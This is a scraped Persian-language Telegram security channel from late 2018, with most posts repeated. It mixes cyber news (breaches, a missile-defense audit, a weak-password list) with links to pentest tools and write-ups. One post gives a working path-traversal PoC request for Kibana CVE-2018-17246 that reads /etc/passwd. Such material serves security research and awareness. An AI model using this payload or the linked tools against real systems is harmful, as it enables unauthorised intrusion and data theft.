امنیت اطلاعات
Photo
امروز جناب جهرمی لطف کردن و راهکارهایی برای آلوده نشدن به سرویس های ارزش افزوده به مردم (به زعم ایشون ناآگاه) پیشنهاد دادن.
جناب دوروف هم محبت کردن و در تلگرام برای کسانی که از رابطهای متفرقه مثل هاتگرام و طلاگرام استفاده میکنن هشداری ارسال کردن که این رابط تلگرامی شما امن نیست و ما نمیتونیم برای امنیت شما کاری کنیم!
وجه اشتراک این دو نفر بجز جوان بودنشون اینه که هردو امکان قطع دست سوء استفاده گران رو دارن. دکمه ها زیر دستشونه ولی ترجیح میدن به جای زدن دکمه ها، به کاربران و مردم عادی هشدار بدن!
جناب وزیر، اگر دروغ و فریب است، قطعشون کن!
آقای دوروف اگر امن نیست،دسترسیشو حذف کن!
#news
#iran
#telegram
#vas
@sec_nerd
جناب دوروف هم محبت کردن و در تلگرام برای کسانی که از رابطهای متفرقه مثل هاتگرام و طلاگرام استفاده میکنن هشداری ارسال کردن که این رابط تلگرامی شما امن نیست و ما نمیتونیم برای امنیت شما کاری کنیم!
وجه اشتراک این دو نفر بجز جوان بودنشون اینه که هردو امکان قطع دست سوء استفاده گران رو دارن. دکمه ها زیر دستشونه ولی ترجیح میدن به جای زدن دکمه ها، به کاربران و مردم عادی هشدار بدن!
جناب وزیر، اگر دروغ و فریب است، قطعشون کن!
آقای دوروف اگر امن نیست،دسترسیشو حذف کن!
#news
#iran
#telegram
#vas
@sec_nerd
گویا گوگل به درخواست FBI اطلاعات شخصی حساب فردی را که باگ های کشف شده خود را به دشمنان امریکا میداد، برای FBI ارسال کرده است!
همچنین اکانت این فرد در توییتر نیز ساسپند شده.
https://twitter.com/SandboxEscaper
این فرد به گفته ی خودش ساکن امریکا نیست و ملیتی امریکایی هم ندارد.
#fbi
#usa
#google
#privacy
@sec_nerd
همچنین اکانت این فرد در توییتر نیز ساسپند شده.
https://twitter.com/SandboxEscaper
این فرد به گفته ی خودش ساکن امریکا نیست و ملیتی امریکایی هم ندارد.
#fbi
#usa
#privacy
@sec_nerd
سیستم های دفاع موشکی امریکا در آزمون امنیت سایبری رد شدند!
بررسی ها در زمینه های زیر صورت گرفته است:
احراز هویت های چند مرحله ای
شناسایی و رفع آسیب پذیری
امنیت فیزیکی سرورها
محافظت از دیتای طبقه بندی دار بر روی دیسک های قابل حمل
رمزنگاری اطلاعات انتقال داده شده
امنیت ابزارهای امنیتی مانند دوربین ها و سنسورها
منبع:
https://www.bleepingcomputer.com/news/security/us-ballistic-missile-defense-systems-fail-cybersecurity-audit/
#news
#usa
#DOD
#security
@sec_nerd
بررسی ها در زمینه های زیر صورت گرفته است:
احراز هویت های چند مرحله ای
شناسایی و رفع آسیب پذیری
امنیت فیزیکی سرورها
محافظت از دیتای طبقه بندی دار بر روی دیسک های قابل حمل
رمزنگاری اطلاعات انتقال داده شده
امنیت ابزارهای امنیتی مانند دوربین ها و سنسورها
منبع:
https://www.bleepingcomputer.com/news/security/us-ballistic-missile-defense-systems-fail-cybersecurity-audit/
#news
#usa
#DOD
#security
@sec_nerd
BleepingComputer
U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit
A U.S. Department of Defense Inspector General report released this week outlines the inadequate cybersecurity practices being used to protect the United States' ballistic missile defense systems (BMDS ).
اطلاعات فردی ۱۲۰ میلیون شهروند برزیلی پرداخت کننده مالیات بدلیل عدم رعایت امنیت سرور، در اختیار هکرها قرار گرفت.
این اطلاعات شامل مشخصات فردی، اطلاعات خدمت سربازی، تلفن، آدرس و ... بوده است.
https://www.bleepingcomputer.com/news/security/taxpayer-id-numbers-for-120-million-brazilians-exposed-online/
#news
#breach
#brazil
@sec_nerd
این اطلاعات شامل مشخصات فردی، اطلاعات خدمت سربازی، تلفن، آدرس و ... بوده است.
https://www.bleepingcomputer.com/news/security/taxpayer-id-numbers-for-120-million-brazilians-exposed-online/
#news
#breach
#brazil
@sec_nerd
اجرای حملات MiTM برای درخواستهای سرویس RDP
https://www.syss.de/fileadmin/dokumente/Publikationen/2017/2017_03_13_Attacking_RDP.pdf
#rdp
#mitm
#windows
@sec_nerd
https://www.syss.de/fileadmin/dokumente/Publikationen/2017/2017_03_13_Attacking_RDP.pdf
#rdp
#mitm
#windows
@sec_nerd
mysql-unsha1
لاگین کردن به mysql فقط با داشتن هش پسورد(SHA1)
https://github.com/cyrus-and/mysql-unsha1
#mysql
#privesc
#pentest
@sec_nerd
لاگین کردن به mysql فقط با داشتن هش پسورد(SHA1)
https://github.com/cyrus-and/mysql-unsha1
#mysql
#privesc
#pentest
@sec_nerd
GitHub
GitHub - cyrus-and/mysql-unsha1: Authenticate against a MySQL server without knowing the cleartext password
Authenticate against a MySQL server without knowing the cleartext password - cyrus-and/mysql-unsha1
سرقت هش های NTLM با استفاده از آسیب پذیری موجود در اپلیکیشن وب
https://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html
#web
#pentest
#windows
#responder
@sec_nerd
https://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html
#web
#pentest
#windows
#responder
@sec_nerd
واکنش رئیس پلیس گذرنامه به وجود GPS در گذرنامه
رئیس پلیس مهاجرت و گذرنامه نیروی انتظامی:
🔹اعلام مطلبی مبنی بر اینکه GPS در گذرنامهها نصب شده است، موضوعی غیرتخصصی و خندهدار است.
🔹ایران همانند ۹۰ درصد کشورهای دنیا گذرنامهاش الکترونیکی است و براین اساس تراشهای الکترونیکی در آن نصب شده است.
🔹در روی جلد گذرنامه نیز علامتی شبیه دوربین حک شده است که به صورت شفاف اعلام میکند که گذرنامه الکترونیکی است.
/فارس
#news
#police
#iran
@sec_nerd
رئیس پلیس مهاجرت و گذرنامه نیروی انتظامی:
🔹اعلام مطلبی مبنی بر اینکه GPS در گذرنامهها نصب شده است، موضوعی غیرتخصصی و خندهدار است.
🔹ایران همانند ۹۰ درصد کشورهای دنیا گذرنامهاش الکترونیکی است و براین اساس تراشهای الکترونیکی در آن نصب شده است.
🔹در روی جلد گذرنامه نیز علامتی شبیه دوربین حک شده است که به صورت شفاف اعلام میکند که گذرنامه الکترونیکی است.
/فارس
#news
#police
#iran
@sec_nerd
Elasticsearch Kibana Console LFI CVE-2018-17246
PoC:
GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
#elasticsearch
#nosql
#exploit
@sec_nerd
PoC:
GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
#elasticsearch
#nosql
#exploit
@sec_nerd
نکاتی در خصوص دایرکتوری های مخفی در وبسایتها برای نفوذگران
https://medium.com/@_bl4de/hidden-directories-and-files-as-a-source-of-sensitive-information-about-web-application-84e5c534e5ad
#web
#pentest
#bugbounty
@sec_nerd
https://medium.com/@_bl4de/hidden-directories-and-files-as-a-source-of-sensitive-information-about-web-application-84e5c534e5ad
#web
#pentest
#bugbounty
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
برخی متدها و کلاسهای Deserialisation در دات نت میتواند با paste کردن منجر به اجرای دستور شود!
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
#windows
#dotnet
#rce
@sec_nerd
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
#windows
#dotnet
#rce
@sec_nerd
هکرهای چینی ۶۱۴ گیگابایت از اطلاعات سیستم ضدموشکی مخصوص ناو را از ارتش امریکا به سرقت بردند.
به گزارش وال استریت ژورنال این حجم از داده طی چندین حمله و در طول ۱۸ ماه دزدیده شده است. هکرهای چینی موفق شدند پیمانکاران نظامی و زیرمجموعه های آنان را هک کرده و تمام اطلاعات مربوط به موشک ها و نگهداری کشتی و استقرار موشک ها را بدست آورند.
یکی از مهمترین اطلاعاتی که دزدیده شده مربوط به یک سامانه موشکی ضد جنگنده مافوق صوت بوده است.
منبع:
https://www.hackread.com/chinese-hackers-stole-secret-us-navy-data/
#news
#breach
#usa
#china
#army
@sec_nerd
به گزارش وال استریت ژورنال این حجم از داده طی چندین حمله و در طول ۱۸ ماه دزدیده شده است. هکرهای چینی موفق شدند پیمانکاران نظامی و زیرمجموعه های آنان را هک کرده و تمام اطلاعات مربوط به موشک ها و نگهداری کشتی و استقرار موشک ها را بدست آورند.
یکی از مهمترین اطلاعاتی که دزدیده شده مربوط به یک سامانه موشکی ضد جنگنده مافوق صوت بوده است.
منبع:
https://www.hackread.com/chinese-hackers-stole-secret-us-navy-data/
#news
#breach
#usa
#china
#army
@sec_nerd
HackRead
Chinese hackers reportedly stole secret US Navy data
Another blow to the US Navy.
Gerix WiFi Cracker 2018
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
Reading ASP secrets for $17,000
https://samcurry.net/reading-asp-secrets-for-17000/
#web
#pentest
#bugbounty
#writeup
@sec_nerd
https://samcurry.net/reading-asp-secrets-for-17000/
#web
#pentest
#bugbounty
#writeup
@sec_nerd
لیست ضعیفترین پسوردهای سال ۲۰۱۸ هم منتشر شد و جالب اینکه کلمه donald هم در این لیست دیده میشود!
123456
password
123456789
12345678
12345
111111
1234567
sunshine
qwerty
iloveyou
princess
admin
welcome
666666
abc123
football
123123
monkey
654321
!@#$%^&*
charlie
aa123456
donald
password1
qwerty123
منبع:
https://motherboard.vice.com/en_us/article/wj3kem/donald-is-now-one-of-the-top-25-most-commonly-used-passwords
#news
@sec_nerd
123456
password
123456789
12345678
12345
111111
1234567
sunshine
qwerty
iloveyou
princess
admin
welcome
666666
abc123
football
123123
monkey
654321
!@#$%^&*
charlie
aa123456
donald
password1
qwerty123
منبع:
https://motherboard.vice.com/en_us/article/wj3kem/donald-is-now-one-of-the-top-25-most-commonly-used-passwords
#news
@sec_nerd
Vice
'Donald' Is Now One of the Top 25 Most Commonly Used Passwords
Another year of horrendous, terrible, no good passwords is in the books.